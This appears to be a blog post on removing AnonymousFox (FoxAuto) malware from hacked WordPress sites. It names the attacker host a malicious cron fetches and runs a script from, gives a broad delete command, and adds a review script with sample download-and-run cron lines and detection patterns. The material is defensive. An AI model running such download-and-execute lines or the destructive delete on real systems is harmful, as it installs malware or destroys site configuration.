🔴 FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website: removing the cronjobs.

While removing AnonymousFox malware from a website I noticed the following cron:

[Screenshot of the cron entry]

It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it. The script is:

[Screenshot of the downloaded script]

It creates a new folder, css, and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt.

source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" *

To remove all these .htaccess files:

find . -type f -name '*htaccess*' -delete

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that Sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.
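The two checks from this post as review helpers, added here as an example (not code from the original post or from Sucuri's guide). The function names, the sample crontab and the matching patterns are assumptions made for illustration; the patterns are heuristics, so every hit still needs a manual look.

```shell
#!/bin/sh
# Added example: review helpers for the cleanup steps described in this post.
# Function names, sample data and regexes are hypothetical, not from the post.

# Constructed sample crontab (NOT the entries found on the infected site).
sample_crontab() {
cat <<'EOF'
# constructed sample
MAILTO=""
0 3 * * * wget -q -O /dev/null https://example.com/wp-cron.php
*/10 * * * * curl -fsSL http://example.invalid/job | sh
*/30 * * * * wget -q -O /tmp/.x http://example.invalid/job && sh /tmp/.x
15 2 * * * /usr/bin/php /home/user/public_html/wp-cron.php
EOF
}

# Read crontab text on stdin and print entries that both fetch a URL and
# hand something to an interpreter (download-and-run, as described above).
# Real use: crontab -l | suspicious_cron   (repeat for each account)
suspicious_cron() {
    grep -Ev '^[[:space:]]*(#|$)' |
    grep -Ei '(wget|curl|fetch|lwp-download)[^|;&]*https?://' |
    grep -Ei '[|;&][[:space:]]*(sh|bash|php|perl|python[0-9.]*)([[:space:]]|$)'
}

# List only the .htaccess files that contain "Deny from all" under a directory
# (default: current directory), so they can be reviewed before deletion.
deny_htaccess() {
    find "${1:-.}" -type f -name '.htaccess' \
        -exec grep -lF 'Deny from all' {} \;
}

# Demo on the constructed sample: prints the two download-and-run entries.
sample_crontab | suspicious_cron
```

The find command in the post deletes every file whose name contains htaccess, including the site root .htaccess, so listing the matches first shows what will be lost. Security plugins also write "Deny from all" rules, which is why the list is meant for review rather than blind deletion.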

2 thoughts on “🔴 FoxAuto WordPress malware”

  1. Hello,
    the command is used from the terminal (SSH), if you are using cPanel, look for the “Terminal” icon:
    [Image: cPanel Terminal icon]

    then enter the folder where your website is located, example: cd public_html where cd means enter and public_html is the directory name.

    and use grep -r "Deny from all" * to find all .htaccess files that are blocking access:

    [Image: cPanel terminal]

    If you are not using cPanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.
